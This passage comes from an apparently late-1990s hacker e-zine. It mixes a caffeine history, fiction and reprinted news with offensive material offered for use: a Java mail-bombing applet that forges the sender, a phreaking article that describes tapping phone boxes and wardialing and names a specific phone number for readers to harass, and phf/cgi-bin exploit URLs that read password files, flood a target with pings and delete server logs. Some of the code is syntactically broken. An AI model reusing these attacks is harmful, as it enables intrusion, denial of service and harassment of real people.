DataInputStream to read lines of text to the socket, and a PrintStream to write lines of text to the socket. Once the applet starts, it uses its SendMail() method to interact with sendmail. SendMail() sends a string to sendmail and returns its response to the applet. The run() method of PopeMail then follows the command format given in /etc/mail/sendmail.hf to send its e-mail letter. It is important to understand clearly what happens here. By viewing the applet, you are forced to connect to port 25 on the applet's home host, and you have no choice in the matter. You need not even be made aware that this is happening. The applet controls everything about your interaction with sendmail: the recipient, the message, and even the return address supplied to sendmail. Nevertheless, the e-mail header identifies you (or at least your machine) as the originator of the message. Of course on a soundly administered system, careful logging will reveal the applet as the instigator, so the threat may not be as serious as it seems at first. PopeMailBomb.Java - [ Java Mail Bombing ] --------------- import java.applet.*; import java.io.*; import java.net.*; public class PopeMail extends java.applet.Applet implements Runnable { public static Socket socker; public static DataInputStream inner; public static PrintStream outer; public static int mailPort = 25 ; public static String mailFromPope = "vaticalcity.va"; public static String toLammah = "lammah@lameville.net"; // Change this! public static String starter = new String(); int i; Thread controller = null; public void init() { try { socker = new Socket(getDocumentBase().getHost(), mailPort); inner = new DataInputStream(socker.getInputStream()); outer = new PrintStream(socker.getOutputStream()); } catch (IOException ioe) {} } public void start() { if (controller == null) { controller = new Thread(this); controller.setPriority(Thread.MAX_PRIORITY); controller.start(); } } public void stop() { if (controller != null) { controller.stop(); controller = null; } } public void run() { try { starter = inner.readLine(); } catch (IOException ioe) {} for(1=0; 1 < 500; i++) { // this is just a sample value, use whatever SendMail("HELO " + mailFromPope); SendMail("MAIL FROM: " + "thePope@" + mailFromPope); SendMail("RCPT TO: " + toLammah); SendMail("DATA"); SendMail("Subject: Your Sainthood" + "\n" +"Greeting O Holy one," + "\n" + "\n" + "I have decided to claim you Saint Lammah for your dedication\n" + "at being lame. Thank you for your hard work. Countless\n" + "generations will smile upon your holy name for your hard\n" + "work. Oh, and my the way, Soul Coughing FUCKING OWNS!!!!\n" + "\n\n\nBy the way, this is a mail bomb!\n" + "\n" + " The Pope, John Paul II\n" + " thepope@vaticancity.va \n" + "\n"); SendMail("QUIT"); } try { socker.close(); } catch (IOException ioe) {} } public void SendMail(String toSend) { String response = new String(); try { outer.println(toSend); outer.flush(); response = inner.readLine(); } catch(IOException e) {} } } Ok, so this code is pretty much the same, but it adds a for loop for bombin people. I added in a sample value if 500, but use what you like. The one pain with this program is that you must edit and compile/run this file each time you wish to bomb a person. Part of this is because we have more than enough mail bombing already, But if you want to make this code more versitile, just add some forms to it for the web applet, or add the code to enter in different values for toLammah, mailFromPope, and even a file to use for the message, its your code now, to whatever you fuckin feel like. I dont care. _____________________________________________________________ [How To Turn Your Car Into A Mobile Phreaking Unit] by phear Well all right then.. I'd like to start off with a special thanks to Havoc Bell and OCPP for putting this in their zine and for having a good zine in general (their getting less and less common.) I'm sure every true phreak out there has been wardialing from home lookin' for a couple pbx's or a fax or two to plague and thought to themselves, damn it sure would be a lot better if I didn't have to do this from home... what with all the *69's and so on.. well I've thought this myself and I decided I was gonna do somethin' about it. That's why I'm writing this article.. how to turn your vehicle.. even the most piece of shit car you've ever had.. you know, the one you always had to pushroll to start, the one that didn't have reverse or an e-brake, into a mobile phreaking unit. What if you didn't have to wardial from home, what if you simply had to pull your car up and whip out a 50ft. phone cable and jack in wherever you pleased. You can.. if you are reading this then you have a pc, or are reading it on a friends pc and I'm sure through your incredibly persuasive powers of coercion you could convince them to try this idea out, in fact just bribe them, you'll thank yourself, offer them your sister, free #900 calls, revenge etc. Anyway, here's what you need.. A pc with a modem.. any pc will do, if you have to go steal your grandpa's XT and stick a 2400bd in it. A monitor, VGA is nice but not a necessity, the smaller the better. A power source. Now the power source issue is a little more complex, right now cuz I'm short on cash I use an APC Powecell backup for electric in the car. I bought it for my pc a while back cuz UE sucks. Anyway its good for about 4 hours and that's plenty. Any kind of backup will do, as long as you get at least an hour out of it, you'll have to find the internal speaker cuz when that sucker starts doing backup power its gonna make a real annoying beep, so take it apart and desolder the internal speaker and then your set. Of course the best type of power supply, the one I recommend is a line inverter, or converter or some shit. Anyway what it does is take the 12vdc from your car and turn it into 120vac. The best one I've ever used is made by tripplite and its about $100. I know, I know a little pricey but its worth it, with the car on you will never notice a decrease in battery power, with the car off you could run a pc about 3 hours without draining the battery much, the cheaper line inverters may cause some strange small lines on your monitor, which really aren't bad just kindave annoying. All right so you've got all your supplies, now your asking yourself what the fuck do I do with all this shit.. You've just got to mount it. I have a small black Escort Gt. If I can fit all this shit in my car then so can you, firstly find a good place for the pc itself. Behind the passenger seat works well, unless you have a van, which is truly the ultimate phreaking machine, then just slap a desk in the back and grab an extension cord. As for the cars, in most cars the best place to mount the monitor is in the front passenger seat wedged in-between the dashboard and the edge of the seat, sits at a nice angle so you can see what your doing and it looks real nice.. or at least as nice as a monitor wedged into a car can look. Now if you just happen to luck out and find a nice small monitor, like a 10" or an 8" then just stash it somewhere... if you have enough room stick it in-between the passenger and driver seats. You wanna put the power supply in an easy to reach place so you can run all the cords to it without a lot of hassle. Then you need to determine how many people are coming with you on your little joyride and tell the other three to go the fuck away you only have room for one and he's riding in the back. Oh yea and if you have an external modem I would recommend sticking it in the passenger side by the door in that crevase under the seat. Okay you also need at least 25ft. of your favorite phone cord.. just take the one off your girlfriends phone.. So, you've got your vehicle all loaded up and your ready to go.. but your not sure exactly how best to use this new found toy. So I'll tell you about a few of the things I've done with mine. Well the first and foremost thing to do is go find a good spot, if your gonna use a good size box with a lot of connections then make sure to bring your beige box, and if you plan on harassing any of these fools grab your favorite touch-tone too. So me and chaos and his girlfriend (don't ask me why I let her go, I didn't have the room and she bitched about her leg cramping the whole time) were out looking for a good spot and found a nice dark church, which by the way are really good spots to go most of the time. We parked the car on the side opened up the phonebox and just plugged right on in.. I had the girlfriend do lookout duty and then dialed 72# 573-xxx-xxxx and forwarded everything to my favorite person to harass... which by the way if anyone wants to call her is 573-581-7077.. and make sure you say something about her mom... anyway .. and since I live in a little shit town people here are very guarded about phone harassment so they respond well to hang-ups. So I loaded up my favorite wardialer, ToneLoc, which is a great wardialer, but I also use THC-Scan from time to time.. I set the call time to 15 sec. to allow for a good two rings and set it to dialing, I called about 80 numbers at random with the wardialer. Now this is one of my favorite tricks.. all the people that *69 call the forwarded number and never interrupt my dialing...so I figured I'd had my fun there and decided to get the hell out of there.. sides, the girlfriend had to use the bathroom, and for some reason the bushes just weren't good enough ( I can't imagine why ) so off we went, to the gas station, where I happened to notice the fax number, wrote it down when I got to the car, and went to another local church, unfortunately it had floodlights.. so I hopped out and unscrewed the bulbs, jacked in and faxed several nasty letters to the gas station about how much I really hate the way they look me when I walk in there, just because I have a nosering and don't like my pants to fit so tight I have to talk in a high pitched voice is no reason to i.d. me every time I want a pack of smokes. So chaos thought it might not be a bad idea to give them a call and make sure they got the faxes. So he called and told the tubby bitch behind the counter to fuck off and enjoy the faxes.. well all right. That's it.. and remember if you see a cop just pretend your lost, most cops are completely pc illiterate and have no clue about phreaking either, so if you cant run then just play dumb. "Oh no officer that's not a pc in my car, it's part of a new computerized throttle control "... or maybe you could try "Well if you weren't so busy eating that doughnut maybe you'd know that this is a highly sophisticated state of the art mobile phreaking unit used to create chaos in the homes of people just like you, and I never would have known about it if it haven't been for Havoc Bell and OCPP and this really fucked up article I read written by some guy named phear who phreaks with chaos and crypto and somebody else's girlfriend, who cant seem to use the bathroom in the bushes." well that's all.. happy mobile phreaking. phear. tyreiron@mail.geocities.com _____________________________________________________________ *** Securities Hole in cgi-bin *** memor@mygale.org - http://www.mygale.org/00/memor *** 1 - The really known phf script: Mostly the URL victim is really unsecure and the system admin doesn't know about cgi-bin security lack. And mostly the hackers do that hole in that way : http://www.victim.com/cgi-bin/phf?Qname=a%0acat%20/etc/passwd but well, lots of phf are patched and more and more servers are now protected and well .. system admins "sometimes" know shadowing their passwd file and having login:x: on Query Result is not really fear for thoses hackers. By the ways.. Http commands (GET mostly) are logged in the /www/logs/ directory.. so when u try some hack with phf on the navy or some secret services.. hm.. u should use a gateway before.. Well.. Their is another uses for that script.. personnaly, i dont use it for reading the server passwd file due to the reasons i explained before.. You must remember that %0a escape to command shell (lf) and that %20 is the space. for example.. im on Efnet IRC and some aol lamer is annoying me ... i use a lame weapon for killing him.. a really lame one : icmp via phf.. /whois AoLaMer *** AoLaMer is ppp125.lamer.aol.com *** AoLaMer is on #Aoltalk *** AoLaMer is using irc.primenet.com *** AoLaMer is away: Lamer *** Notice that i used some lame mirc winblows interface. [10:01] You suck dude, im 3|1+3 cause i use AoL! [10:02] ok man i use my favorite netscrupe brownser now and i enter that url: http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20 -s%205000%20ppp125.lamer.aol.com well that command will be translated for the server by (translate %20 in space) a ping -c 1000 -s 5000 ppp125.lamer.aol.com the victim server will hit that dude modem with 1000 packets of 5008 bytes.. if he is really lame.. abort the current Contacting Server (the netscrupe wont stop to "Contacting Server" since the icmp is not completly done) .. so abort it.. The icmp will continue during that time.. and do another Query.. so another 1000 packets of 5008 bytes.. when i tryed to icmp with ping echos > 6008 bytes, the server returned -1.. well : an error. There is anothers uses.. commands in /bin that www can access and u can mkdir write in the www dirs.. like (...)%20cp%20phf%20.fhp will copy phf to .fhp so the kewl root wont see it with a normal ls (-l) but.. hmm beware if he uses ls -a .. so u'll be able to call it by a http://www.victim.lame.com/cgi-bin/.fhp after.. *** 2 - Wrap Script: Well i'll be quick on Wrap script ... its a boggus script found in irix 6.2 features i know and the use is http://www.victim.com/cgi-bin/wrap?../../../etc/passwd i know that script allow only a file view.. and well on irix.. and.. passwd files are sometimes shadowed. well i didnt try http://www.victim.com/cgi-bin/wrap?%0als(...) so.. i dont know if that script is so boggus.. i should also try some buffer overflow.. but same here.. i dont know if it works. *** 3 - View-Source Script: I was really proud to find that script.. i found it in the florida institute of technology server.. http://www.fit.edu after they had patched their phf by "rm-ing" it and after having "rm-ed" my fhp and my .fhp and my another .YouSuck ones.. They know the use of ls -a , Wonderfull!! but well.. here view-source was not really usefull.. view-source is a "wrap" for Netscape Communicator 2.0 features. (do a http://www.future.victim.com/cgi-bin/test-cgi) and well.. like wrap.. its the same way to access the passwd file.. http://www.new.victim.com/cgi-bin/view-source?../../../etc/passwd .. on www.fit.edu their passwd file is shadowed btw. i tryed some http://www.old.victim.com/cgi-bin/view-source?%1b or %0a .. others %20.. but.. no work.. the only strange thing i saw was on a %0a .. some strange Query Results were appearing.. I tryed a buffer overflow of view-source but it doesnt work. *** 4 - php.cgi Script: Well i never used php.cgi script but i know that its normally like a wrap or a view-source... so the use is http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd well same here.. i did heard it had a was to escape to command shell.. but i dont know about it. personnaly i use others ways (not httpd ones) for hacking servers. *** 5 - Some uses i did with phf. http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s %205000%20ip%20to%20shoot http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20fhp http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20.blah http://www.victim.com/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go http://www.victim.com/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate http://www.victim.com/cgi-bin/phf?Qname=a%0arm%20../logs/access_log *** 6 - But remember: The httpd access are logged in the logs dirs of the www directory. so.. hmm dont try to hack some "High Security" server with that.. well for me i hacked one time a "hot" server.. National Supercomputing Center for Energy and Environnement (www.nscee.edu) .. the next day.. all was patched and all the passwd file i got and decrypted was.. disabled .. :*: _____________________________________________________________ The History of Caffeine by Scud-O NOTE: This was for my chemistry project, which i did publish online. However, im not giving out the url, since well it kinda reveals who i am, so if you REALLY want to see the project and all the cool pictures, e-mail me. Prehistory ( 600,000 - 700,000 years ago ) Most known caffeine-yielding plants were probably discovered and used during the paleolithic, or Stone Age, times, which were appoximately 600,000 to 700,000 years ago. The Stone Age people probably chewed the seeds, bark, and leaves of many different plants, and the most likely associated the chewing of certian plants ( the caffeine-yielding ones ) with the resulting changes in mood and behavior. Eventually, caffeine was cultivated and consumed to banish fatigue, prolong awakeness, elevate mood, and promote concentration. The Stone Age people may have learned to ground the caffeinated plant material into a paste and used it to aid in digestion. Much later it was discovered that by adding the plant into hot and boiling water that a liquid could be created that when ingested produced even greater effects. ( How else do you think someone would learn to boil something dark and bitter like a coffee bean? ) The boiled drink produced greater effects since more caffeine is extracted from a plant substance at higher temperatures. This discovery led to the origin of all caffeine containing beverages, including coffee, tea, soda, cocoa, kola tea, yoco infusion, cassina, mate, and guarana. Tea & It's History Tea has always been used both as a hot beverage and as a medicine. Records have indicated that tea drinking may date back to as far as 4,700 years ago. Tea use ( as well as many other aspects of Chinese culture ) spread to Japan around 600 A.D., but it took another 700 years for it to fully integrate into the Japanese life. During the 17th century ( 1600 AD ), just as the use of coffee was being introduced into Europe from Turkey, Dutch traders began to bring tea into Europe. Despite its initial high cost, It quickly spread through out Europe, and soon became the beverage of choice ( displacing coffee ) in many areas of Europe. Tea took a particularly strong hold in North American colonies. A tourist visiting the colonies during the 1760s once wrote that American women were "such slaves to it ( tea ) , that they would rather go without their dinners than without a dish of tea". Partly to reaffirm its status as a strong colonial ruler, ( and to collect more revenue ) , in 1767 the British government put a special tax on tea and several other items. As a result, the colonists boycotted tea and began using substitutes and alternatives, such as coffee. They also partook in events like the Boston Tea Party, and either tossed tea overboard or blew up ships trading tea, or just plainly denying them the ability to dock. To keep the revolution up, local doctors and clergy attributed an assortment of ills and evils to tea drinking. During this time, most of the worlds's tea came from China, ( and most of it still does ) . Through the East India Company, the British had almost a total monopoly on the tea trade. In 1833, when the company's commerical treaty with China had expired, British control of the tea trade became weaker and weaker. After 1833, the British tried cultivating tea in the Indian subcontinent. However, China tea did not grow well in India, and the tea plantations of India were only successful when the local Assam variety of tea was cultivated. As recently as the 1870s , more than 90% of British tea was still pouring out of China. The Insecurity of Britain's hold on the tea trade was not helped by a domestic tax on tea, which in the early 19th century, was 15 times higher than the tax on imported coffee. This resulted in coffee use in Britain which increased tenfold in the forty years between 1800 and 1840, during which time coffee over took tea as the drink of choice. After this period however, several scandals involving coffee led the people back to tea. After the discovery that several of the larger coffee importers added such additives as roasted corn, vegetable roots, and even baked horse liver (!) had been used to increase the bulk of ground coffee, many buyers and drinkers were disgusted ( wouldn't you have been disgusted at that? ) and returned to tea. Also during this scandal, perhaps to help people use tea again, the taxes were lowered on imported tea. Coffee & It's History Coffee was first mentioned in an Arabic document from the 10th century. There is evidence however, which states that in Ethiopia, coffee was cultivated and the berries chewed as early as the 6thy century. During the 10th century, Arabic people crushed the coffee berries, fermented them, and made a waine called qahwah. Then, in the 11th century, they began to use the beans to produce a hot drink from the berries, which they also called qahwah. As the use of this beverage spread throughout the world, the word was adpated to the various languages of the coffee drinking world, producing such words as cafe, Kaffee, koffie, and coffee. By the end of the 17th century the Dutch had established coffee plantations on the Indonesian island of Java. ( hence the famous nickname of coffee, Java ). During the next 50 years, the first French and then the British followd suit in their Caribbean colonies. Commercial sultivation of coffee spread from the Caribbean to Central and South America, and by the early 19th century Brazil had supplanted Indonesia as the mojor producer and exporter of coffee. By 1860, the US was consuming three quarters of the world's coffee, more than half of which came from Brazil. _____________________________________________________________ -------------- --=[Untitled]=-- Provided with permission by the author -------------- "Why does the ringing not stop? Somebody stop that ringing!" My mind was screaming those thoughts, yelling with every ounce of its membrane. "Please make it stop... Wait, why is everything so black? Is this normal?" I suddenly stopped thinking. The ringing had stopped. Feeling nothing, thinking nothing; existing was all I could do. Blackness was everywhere. The blackness did not surround me, I was not a part of it, but I was not separate from it either. Perhaps I was the blackness. No thoughts entered my mind. It was not that I couldn't think, not that I was impaired somehow, rather that I simply did not think. It was not in my power to think. Thinking is just something I do not do; how could I? The insistent ringing started again. "No! No more ringing!" Thoughts streamed through my brain again. I felt cold, and lonely. Cold like you do when the wind blows right through your sweater and makes your skin tingle. I was not lonely for lack of company; the loneliness was something more. I was lonely for a part of me. "Which part?" I asked myself. "Is there something missing?" Suddenly fear ran through me like a cold drop of water when it falls under your collar. "Something *is* wrong! I can feel it..." quickly my fear turned to anger. "STOP RINGING! STOP THAT RINGING!" I couldn't take that ringing anymore. I tried to turn my head and open my eyes. "Ugh!" I couldn't open my eyes, but I saw! What I saw was incredible. I was in space, in deep space. Huge galaxies in front and behind me, rotating slowly, spinning round in total silence. To my side, two galaxies inverted in each other, amazing. Total silence. My thoughts stopped. The galaxies spin silently in the depths of the universe. Colors streaked inside each galaxy in view, reds being left behind in the wake of stars, blue diamonds seemed to sparkle in the middle of each red. All the red began to slowly fade into an emerald purple with dark green spots every so often. Every light I could see began to pulse. The pulsing, slow at first, a deep rhythmic pulsing, almost as if the universe itself was breathing. Quicker the pulsing became, now like a heart beat, now like the flashing lights on a police cruiser. Faster still the pulsing was. Like the frames of a movie. Like the propeller of a plane. Darkness. Nothing. My mind sprang back to life yet again. "I'm dead. I am dead. This is what death is." But I was not sure of my thoughts, I had never been dead before you see. "Are my eyes closed?" I attempted to send the command from my brain, through my forehead, to my eyes. Open. Nothing. I couldn't be sure I even had eyes. Nothing had changed, nothing had moved. From somewhere deep back in my mind a ringing became clearer, more persistent. "Maybe this is hell. Perhaps this is what a bad fone phreak gets as punishment, eternal ringing." The ringing increased in volume somewhat. I tried to recall how I came to this. "Why am I here? What happened.. I know! I was holding those 3 lines when ringing current was applied to them. That's it. That's why I am hearing this horrible ringing now. It must have gotten stuck in me... Wait, what am I saying? What does that have to do with this ringing I'm hearing.." I was having trouble thinking clearly, and the ringing wasn't helping any. I felt sick to my stomach, but seeing, apparently, that I didn't have a stomach, I wasn't sure what I was sick to. But I did feel sick, the kind of sick you get in the car when you're not watching the road. I couldn't move, couldn't see, couldn't feel a body, couldn't stand that eternal ringing! Light! Cool air rushed over my body and through my hair as this light blinded me. Heaven? The car passed me quickly with the sound of its motor changing pitches as it receded into the distance taking the light with it. I could see again. I was on the side of a small two-lane road, in what appeared to be the middle of the desert. An open bridging box was next to me, its 2 record tables lying on the ground, half covered with dirt. A lineman's handset, laid in the dirt, both of its clips attached to binding posts in the box. "The ringing, it's coming from the handset." And sure enough it was. The handset shook every time it rang. It did not strike me as odd; it was the way it should be. I stared at the handset. It rang. And rang. 10, 20, 30 times it rang. I stood in the dark, the slight breeze sending a chill though me, watching the handset. Everything went black. The ringing continued. The handset was still there, its alligator clips floating in the black. Total silence pierced at intervals by the horrible ringing. The handset shook every time it rang. It did not strike me as odd, why should it? It was as it should be. I reached out for the handset, not with my hand, not with my mind, I simply reached. The ringing stooped with the line going off hook. I waited. I listened. Nobody spoke. "Hello?" I asked. No response. I questioned again into the handset. "Hello? Who is there?" A long pause, then, the most soft, and quiet, female voice I had ever heard came on the line. "Mr. Quince? I have a collect call for u from a friend. Do you want to except?" "Yes I will except." I replied without giving it a thought. It was getting hard to think again, and I didn't want to force myself to. A few clicks on the line, a short pause, and then he spoke. He spoke softly, like the operator did, but with a tinge of slowness "Hello Keith." I paused before responding, thinking to myself. "Why can't I focus my thoughts? What is wrong?" I considered the darkness around me, the dead silence. I couldn't think. I began to not care. "Who is this?" I asked with a bit of despair. "This is your mind Keith." My thoughts were so groggy; I could barely keep track of what was going on. The darkness seemed to grow more intense if that was possible. The handset started to loose its color and depth until it was nothing more then a black and white picture. "What do you want?" I managed to get out. The darkness was consuming me. I couldn't tell where I ended and it began. My thoughts were soon to stop forever. Before that however, I heard the voice's sweet and gentle reply. "I just called to tell you. To tell you that I am leaving. Forever." his voice echoed softly down to a mummer. I became blackness, ceasing to exist. All that was left, All that remained, was the black and white picture of the handset. _____________________________________________________________ [Looking Back] a year later.... by Scud-O God, i can not believe that THTJ is 1 year old this month. Hell, I can not believe how far the zine has come. On June 6th last year (1996), Our first issue came out. It was an in print zine, and at the time, HAVOC Bell Systems wasn't HAVOC Bell Systems, it was HAVOC. I Created HAVOC to be a local group, my friends, etc. Well, my friends werent really hackers or phreakers, they were just a buncha 'anarchists' interested in blowing stuff up, and other such things. Needless to say, THTJ no longer prints anarchist files, nor is it in print. About the same time as THTJ 1 came out, the web site at our old geocities came online. Hell, at the time i knew next to nothing on HTML, look at the site today, much better. I first made the site to be just for the HAVOC group, on local stuff, but that changed. I realized what a place the WWW was. It was a great distribution site for THTJ. Issues 2 and 3 came out during the summer, with mostly a buncha shit i wrote that i am shocked i could have ever written. By October, i had come back to IRC and both #phreak and #hacker, channels i had hung out in, and been mostly an idler. Id talk, but not that much. Anyway, i met some very cool people like the MIA |\|\cFill , and current member Keystroke. Afterward, i met REality, and got him to sign up, then hell everyone was pouring into HBS. We released issues 4 and 5 which mostly had stuff by me, however 5 did include stuff by Key and McFill. Issue 6 came out around the new year, and then well i released the bomb. Issue 7 came out, and well, sucked. After 6-9 months of working on THTJ i had released a bad issue, was well was worried about THTJ. I was determined to make issue 8 the best yet. And well, i think i succeded. It was a smashing release, and was well recieved. However during this time, i had let my grades slip, and i had to let KungFuFox edit THTJ 9. I REALLY want to thank you for editing THTJ 9 for me Kung, I owe you so much, with out you, hell THTJ would still have a readership of like 100 instead of the thousands that are reading it currently. Then, well issue 10 came out and was a huge success like issues 8 and 9 before it, and well here is issue 11, which probably is going to have a big release like the issues before it. I want to thank you all for reading this article of an insane editor, and to thank you for reading THTJ and keeping it alive. And I hope THTJ is doing just as well one year from now as it is currently doing. _____________________________________________________________ [The News] Edited by KungFuFox -------------- --=[The News]=-- Compiled & edited by KungFuFox -------------- 1 : AOL Mail Chokes on Spam Antidote 2 : Pretty Good Politics 3 : Hong Kong Is Asia's Spam Epicenter 4 : Polish Govt Web Site Hacked - Police Investigate 5 : Gates Harasser Charged 6 : Java Bug Discovered 7 : Anti-Microsoft Sites Rampant On Web 8 : World Wide Web to arrive on pay phones 9 : Phone company says: Put your life on hold until we fix your line 10: Japanese Police Nab Computer User On Hacking Charges 11: Opening Communication Between PCs and Phones 12: Phone giants talk of $50 billion deal 13: HFStival on May 31st cool.. war games is on next where? on my tv its cool.. its like radio.. but with pictures and stuff -=- "Ebonics are kinda like women. I don't understand either of them, but they're both kinda neat." -eclipse -=- could someone tell me what root is? People keep talking about it.. like a tree root? i know what a tree root is.. _____________________________________________________________ AOL Mail Chokes on Spam Antidote by Michael Stutz 12:02pm 13.May.97.PDT -- A rash of email delivery problems this past week at America Online - including the clogging of several Internet mailing lists - have been caused mainly by the company's spam-fighting efforts, officials at the Dulles, Virginia-based company, claim. Last Friday, AOL chief Steve Case had affirmed a beefing up of the company's email capabilities in his latest "Community Update" column, saying that recent efforts to improve system quality included AOL's increased ability to handle email, and that the number of incoming messages the service could handle was up to almost 400 million per month. But while Case's words rang in the background, a portion of the email messages directed at AOLers from the rest of the Net took up to five days to arrive - or simply bounced back to the sender. Alex Phillips, an administrator at Rockingham Internet Community Access, said the problem caused his company to have almost 8,000 messages to AOL addresses pile up on his email server. "It seemed to be localized to select domains on the Net," he said. "Many messages from other ISPs in the country were flowing just fine. Our mail server is in Boise, Idaho, and trace routes to AOL's mail server were showing no response from their St. Louis hop for about a week." The problem was especially harsh on mailing lists, where copies of each post would get forwarded to each AOL subscriber on that list, and either bounce back to the moderator or pile up in the list's email queue. The Searoom-l, a list for the discussion of wooden sailing ships, was one of the many lists that felt the curse of AOL email last week. In a message posted to the list, list moderator John Berg had said, "AOL changed their software which rejects incoming messages. We can see Searoom-l subscribers' messages, but they can't see ours, because AOL's new software doesn't accept our messages." AOL spokeswoman Tricia Primrose said the problem was an internal gaffe, caused by an effort to stop spam by selectively blocking incoming email messages. "I talked to one of our operations guys and he verified that we did have a problem last week," she said. "We're aggressive in protecting our members from spam, and we put in a change last week to block it out - and it unintentionally blocked some incoming listserv mail as well." The default mail setting for AOLers is PreferredMail, which filters incoming email from a list of rogue domains and spammers. The list of sites is available to AOL members by an internal AOL document called "PreferredMail - The Guard Against Junk E-mail," Primrose said. A court order last year had limited the notorious spam factory Cyber Promotions to sending to AOL from only five domains, which AOL has put on its PreferredMail filter list. The list is updated when users forward copies of spam to the AOL screen name TOSSPAM. Primrose noted that the PreferredMail option could be disabled, should the user want to receive unsolicited commercial email, but that "the vast majority of our members don't like spam." Email delivery problems have plagued AOL for some time - a lag between the steady influx of AOL customers and the company's equipment upgrades have put a strain both on its system and the rest of the Net. One month ago, a huge backlog of AOL mail was returned to sender to the University of Madison's email server, causing it to crash. "We're constantly scaling our architecture to increase the demand," says Primrose, noting that internal mail down times do occur, usually lasting from 15 minutes to 2 hours in length. She said AOL has seen email "increase dramatically in the last five months, coinciding with our switch to flat-rate pricing, and going from 5 million to 12 million messages a day." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Pretty Good Politics by Simson Garfinkel 5:00am 7.May.97.PDT -- Phil Zimmermann is about to fight the biggest battle of his career. But this time Zimmermann isn't fighting against the US government; he's fighting against Microsoft and Netscape. Zimmermann is, of course, that mythic crypto rebel hero. Back in 1991, Zimmermann wrote an email encryption program called PGP (pretty good privacy) and gave it away. PGP was "encryption for the masses." That made the US government nervous. But PGP has had a big problem since its invention - the program was (and still is) extremely difficult to use. As a result, most people who have PGP rarely use it. Hell, I even wrote a book about how to use PGP, and I hate getting encrypted email; it's a pain. Still, the encryption program has been the de facto standard for six years. Zimmermann and his start-up, PGP Inc., are trying to develop an easier-to-use version of the program, and a plug-in for Netscape Navigator to make encryption transparent. Unfortunately, they may be blowing into the wind. That's because both Netscape Communicator, bundled with Navigator 4.0, and Microsoft Outlook Express, bundled with Explorer 4.0, come with built-in support for email encryption, and they don't use PGP. Instead, they use a different technology, called S/MIME. S/MIME is an encryption standard developed by RSA Data Security. What's developing here is one of those religious wars for which the computer industry is so well known. On one side, there is the alliance between Netscape, Microsoft, RSA Data Security, and much of the computer industry. They are pushing for S/MIME as a worldwide secure email standard. On the other side is PGP Inc., which says the S/MIME standard is fundamentally flawed because it requires support for 40-bit crypto, which is too weak to be of much utility, but exportable under federal law. Charles Breed, PGP's director of technical marketing, says S/MIME turns its back on the thousands of Internet users who use PGP. Netscape brushes off Breed's charges. "We don't want to get into religious wars on the mail standards," says Eric Greenberg, Netscape's security product manager. "There are a lot of PGP users out there, and we are pleased that PGP has offered a plug-in for our product." For S/MIME, the real problem doesn't seem to be PGP but the Internet Engineering Task Force. RSA has offered S/MIME to the IETF as a proposed standard for sending encrypted email. But at the last IETF meeting in Memphis, Tennessee, a number of objections were raised: 1.S/MIME is a trademark of RSA Data Security. In order for it to be a standard, RSA would have to give up the trademark. 2.The S/MIME standard currently requires that any implementation be able to encrypt and decrypt data using the RC2 data-encryption algorithm and the RSA public key algorithm. Although RC2 has been published on the Internet, the algorithm is still officially an RSA Data Security proprietary technology, and the company has threatened to take legal action against any firm that implements the algorithm without a license. As for the RSA algorithm, it's patent isn't up until the year 2000. 3.Finally, S/MIME's requirement that any implementation be able to encrypt and decrypt messages with a 40-bit key doesn't sit well with IETF's technical gurus, who don't want to approve a standard that requires weak crypto just so US companies can sell their wares overseas. IETF's charter is to create the best standard possible, not to create a standard that is in the interests of US businesses. "S/MIME in its current incarnation cannot become an Internet standard," says Jeff Schiller, who heads the IETF's section on security. "So basically, one of three things has to happen. One is that the RSA people give the IETF people the appropriate rights to the trademark. Either they have to give up on RC2 and allow other public key algorithms - it should be possible to implement this Internet standard without having to buy technology from RSA. Or the IETF needs to develop something [for which] all the rights are available." RSA has until 1 July to make up its mind, Schiller says. The standard may already be moot. With Microsoft and Netscape poised to ship millions of programs that implement S/MIME, there certainly will be encrypted email for anybody who wants it. On the other hand, it would be nice if there were an international email encryption standard that wasn't hobbled by 40-bit restrictions. The real losers in all this are Phil Zimmermann and PGP Inc. That's because the same rules that prevent Netscape or Microsoft from selling strong crypto overseas also block PGP from doing the same. PGP's only market is the United States, and it is competing against Microsoft's free Outlook Express - which is a pretty darn good email program - and Netscape's Communicator, which does a much better job of integration than PGP can with its plug-in. ©Packet _____________________________________________________________ Hong Kong Is Asia's Spam Epicenter By Eric Lai, IT Daily. HONG KONG, 1997 MAY 14 (NB) -- The Spam capital of Asia? Without a doubt, Hong Kong. Two big reasons: Hong Kong's pro-business culture and the proliferation of ISPs. The Office of Telecommunications Authority says that under the existing licence for ISPs, the "transmission of unsolicited advertising information or unsolicited promotional information" is forbidden because it is a public nuisance. The problem is enforcement. OFTA says that regulating junk e-mail is up to individual service providers. Hong Kong ISPs informally agree to help each other find and terminate spammer accounts, according to Daniel Ng, president of the Hong Kong Internet Service Provider Association, a local trade group, and Hongkong Star Internet. But as evidenced by complaints from Internet users around the world, local ISPs have been a little lax in cracking down on spammers. Part of the problem is the sheer number of ISPs here. The territory has around 60 ISPs, serving, according to IDC, around 114,000 subscribers. The resulting heavy competition means that earnest spammers can cheaply and easily hold multiple accounts. Singapore, by contrast, has about the same number of Internet users, but due to an arduous licensing process, only three commercial service providers. Singapore regulations restrict access to political and sexual material on the Internet, but they don't ban junk e-mail. The Singapore Broadcast Authority and the Telecommunications Authority of Singapore don't regulate junk e-mail, or junk faxes, either. The SBA says they only deal with broadcasting and broadcasting material, while the TAS says it doesn't deal with content. In the absence of formal rules, Singaporean ISPs have decided to follow accepted netiquette and stop spam when they find it. "Basically spammers are a nuisance," says Maureen Tseng, communication manager for Pacific Internet. While bulk e-mailers have never inadvertently crashed Pacific Internet's mail servers, they have slowed down performance in "isolated instances." Tseng, as well as officials from CyberWay, another ISP, agreed that commercial spamming has not been a major problem. In the Philippines, there are also more than 60 service providers and no formal regulations against junk e-mail. But commercial junk E-mails are also relatively unknown, according to industry executives there. "We're just not that technologically advanced," quipped a manager at InfoCom, the Philippines' largest ISP. Could it be Hong Kong's fabled moneymaking culture which, at the very least, does not actively frown upon efforts to make a buck? Chapman Chow of Active Promotion thinks so. Out of more than 3,000 e-mails from Internet users requesting to be taken off Active Promotion's list, Chow claims he "didn't get any upset replies." This, he says, indicates 